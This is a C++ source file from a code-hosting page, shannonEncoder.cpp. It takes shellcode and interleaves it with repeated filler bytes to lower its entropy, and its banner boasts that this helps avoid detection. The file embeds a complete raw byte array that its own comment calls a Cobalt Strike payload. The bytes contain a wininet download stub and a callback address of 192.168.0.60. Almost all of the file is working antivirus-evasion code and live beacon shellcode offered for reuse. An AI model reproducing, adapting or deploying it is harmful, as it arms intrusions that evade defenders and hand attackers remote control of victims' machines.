-
-
Notifications
You must be signed in to change notification settings - Fork 30
/
shannonEncoder.cpp
71 lines (62 loc) · 7.1 KB
/
shannonEncoder.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <cstdio>
#include <windows.h>
#include "Entropy.h"
using namespace std;
char banner[] = "\n\n @@@@@@ @@@ @@@ @@@@@@@@ @@@ @@@ @@@@@@@ @@@@@@@ @@@@@@ @@@@@@@ @@@ @@@\n !@@ @@! @@@ @@! @@! @@! @@! @@! @@@ @@! @@@ @@! @@@ @@! !@@\n !@@!! @!@!@!@! @!!!:! @!! @!! @!! @!@!!@! @!@ !@! @!@@!@! !@!@! \n !:! !!: !!! !!: !!: !!: !!: !!: :!! !!: !!! !!: !!: \n ::.: : : : : : :: ::: : ::.: : : ::.: : : : : : : :. : : .: \n\n=============[The more predictable you are, the less you are able to get detected.]====";
//this is a raw cobalt strike payload (high entropy: size 891)
BYTE payload[] = { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x75,0x72,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4f,0xff,0xff,0xff,0x5d,0x6a,0x00,0x49,0xbe,0x77,0x69,0x6e,0x69,0x6e,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xe6,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x48,0x31,0xc9,0x48,0x31,0xd2,0x4d,0x31,0xc0,0x4d,0x31,0xc9,0x41,0x50,0x41,0x50,0x41,0xba,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x73,0x5a,0x48,0x89,0xc1,0x41,0xb8,0xfb,0x20,0x00,0x00,0x4d,0x31,0xc9,0x41,0x51,0x41,0x51,0x6a,0x03,0x41,0x51,0x41,0xba,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x59,0x5b,0x48,0x89,0xc1,0x48,0x31,0xd2,0x49,0x89,0xd8,0x4d,0x31,0xc9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xba,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x48,0x83,0xc3,0x50,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0xff,0xff,0xff,0xff,0x4d,0x31,0xc9,0x52,0x52,0x41,0xba,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x0f,0x85,0x9d,0x01,0x00,0x00,0x48,0xff,0xcf,0x0f,0x84,0x8c,0x01,0x00,0x00,0xeb,0xd3,0xe9,0xe4,0x01,0x00,0x00,0xe8,0xa2,0xff,0xff,0xff,0x2f,0x5a,0x68,0x4a,0x51,0x00,0x14,0xdf,0xc3,0xe6,0x67,0xb2,0x3f,0xf0,0xa4,0x07,0x0b,0xb8,0xd1,0xe4,0xcc,0xcf,0xbe,0x10,0x4a,0xcf,0x53,0x93,0xa1,0x73,0xbe,0x8c,0x7d,0xcc,0xbf,0x2d,0x4a,0x9f,0xe3,0x0c,0x73,0xa5,0xa2,0xc2,0x3c,0xf3,0x9d,0x5f,0x22,0x53,0x6a,0x36,0xc2,0x0d,0x51,0xb2,0x05,0xbb,0xce,0x68,0x1b,0x29,0x3d,0xf4,0xa3,0x82,0xe7,0x2e,0xb5,0x51,0x02,0x85,0xe9,0x9e,0xa9,0xd9,0x0b,0x50,0x81,0x00,0x55,0x73,0x65,0x72,0x2d,0x41,0x67,0x65,0x6e,0x74,0x3a,0x20,0x4d,0x6f,0x7a,0x69,0x6c,0x6c,0x61,0x2f,0x34,0x2e,0x30,0x20,0x28,0x63,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x6c,0x65,0x3b,0x20,0x4d,0x53,0x49,0x45,0x20,0x38,0x2e,0x30,0x3b,0x20,0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x20,0x4e,0x54,0x20,0x35,0x2e,0x31,0x3b,0x20,0x54,0x72,0x69,0x64,0x65,0x6e,0x74,0x2f,0x34,0x2e,0x30,0x3b,0x20,0x47,0x54,0x42,0x37,0x2e,0x34,0x3b,0x20,0x49,0x6e,0x66,0x6f,0x50,0x61,0x74,0x68,0x2e,0x32,0x29,0x0d,0x0a,0x00,0xb3,0xf4,0xdf,0xb0,0x7e,0x71,0x50,0x93,0x5d,0xd1,0xf9,0x31,0xc6,0x13,0x25,0x49,0x7c,0x07,0xc9,0x28,0x2f,0x65,0xc3,0x82,0x61,0x10,0x1b,0x8b,0x19,0x4a,0x0a,0xd0,0x86,0x2c,0x51,0xcd,0x33,0xc5,0xca,0xb7,0x61,0x89,0xe7,0x8a,0x38,0xb0,0x01,0x48,0xdb,0x48,0x78,0x33,0x80,0xaa,0xea,0x71,0xb2,0x5f,0x73,0x90,0x95,0x52,0x48,0x28,0xd2,0x65,0xf4,0x71,0x97,0x73,0xb6,0x49,0x10,0x2b,0xf4,0xd7,0xe0,0xc0,0xc0,0x09,0x0d,0x9a,0x17,0x1f,0x49,0xe3,0x52,0x4a,0x03,0xb8,0xcc,0x8b,0x72,0x0b,0x5f,0x7d,0x65,0xc8,0x44,0xf0,0x4f,0xe3,0x8b,0x69,0xcb,0xe8,0xee,0xeb,0xc3,0x50,0x95,0x4d,0xdd,0x37,0x49,0xd0,0x0b,0x81,0x2a,0xe6,0x53,0xeb,0x9d,0x49,0x97,0x73,0xcc,0x9f,0xec,0xa3,0x3d,0x3e,0x69,0xc4,0x22,0x28,0x3a,0x5a,0xc1,0x3a,0x24,0xa8,0xda,0x33,0x29,0x0d,0x88,0xd4,0x8e,0x36,0x24,0x4a,0x54,0x2b,0x04,0x8d,0x26,0x46,0xbc,0x85,0x4e,0x1c,0x98,0xb5,0x71,0xed,0xef,0x54,0xeb,0xca,0x1e,0xa5,0x64,0xba,0x51,0x48,0x5c,0x26,0x71,0x65,0xd5,0x39,0x99,0x6e,0x56,0x8e,0xf0,0x74,0xd6,0x4f,0x93,0xb0,0x26,0x64,0x82,0xfc,0x0f,0x09,0xf2,0xd7,0x70,0x0e,0xee,0x06,0xb3,0x00,0x41,0xbe,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x48,0x31,0xc9,0xba,0x00,0x00,0x40,0x00,0x41,0xb8,0x00,0x10,0x00,0x00,0x41,0xb9,0x40,0x00,0x00,0x00,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x41,0xb8,0x00,0x20,0x00,0x00,0x49,0x89,0xf9,0x41,0xba,0x12,0x96,0x89,0xe2,0xff,0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb6,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,0xd7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xc3,0xe8,0x9f,0xfd,0xff,0xff,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x30,0x2e,0x36,0x30,0x00,0x5e,0x2e,0x78,0x90 }; //change to your shellcode
constexpr int number_of_chunks = 5; //change the number to your needs (optional)
constexpr int chunk_size = sizeof payload / number_of_chunks;
constexpr int remaining_bytes = sizeof payload % number_of_chunks;
BYTE lowEntropyShellcode[sizeof payload * 2 - remaining_bytes] = { 0 };
PBYTE shannonEncode(PBYTE rawShellcode)
{
constexpr int max_n = 0xEF; //239
constexpr int min_n = 0x01; //1
char random_hex[chunk_size];
int encodedShellcodeOffset = 0;
int shellcodeOffset = 0;
const BYTE new_n = static_cast<BYTE>((rand() % (max_n + 1 - min_n) + min_n));
for (char& i : random_hex)
{
i = static_cast<char>(new_n);
}
for (size_t i = 0; i < number_of_chunks; i++)
{
for (size_t j = 0; j < chunk_size; j++)
{
lowEntropyShellcode[encodedShellcodeOffset] = rawShellcode[shellcodeOffset];
encodedShellcodeOffset++;
shellcodeOffset++;
}
for (const char k : random_hex)
{
lowEntropyShellcode[encodedShellcodeOffset] = k;
encodedShellcodeOffset++;
}
}
if (remaining_bytes)
{
for (size_t i = 0; i < sizeof remaining_bytes; i++)
{
lowEntropyShellcode[encodedShellcodeOffset++] = rawShellcode[shellcodeOffset++];
}
}
for (int count = 0; count < sizeof(lowEntropyShellcode); count++) {
printf("0x%02X,", lowEntropyShellcode[count]);
}
return lowEntropyShellcode;
}
int main() {
for (int index = 0; index < sizeof(banner); index++) {
printf("%c", banner[index]);
}
printf("\n\n\nShannon Fano Encoded shellcode:\n\n");
const auto lowEntropyArrayPointer = shannonEncode(payload);
BYTE normalPayload[sizeof payload * 2 - remaining_bytes] = { 0 };
memcpy_s(normalPayload, sizeof normalPayload, lowEntropyArrayPointer, sizeof payload * 2 - remaining_bytes);
const auto encodedArray = calculate_entropy(reinterpret_cast<char*>(normalPayload), sizeof normalPayload);
const auto normalShellcode = calculate_entropy(reinterpret_cast<char*>(payload), sizeof payload);
printf("\n\n---------------\nOriginal array Entropy is: %f\r\n", normalShellcode);
printf("Processed array Entropy is: %f\r\n", encodedArray);
}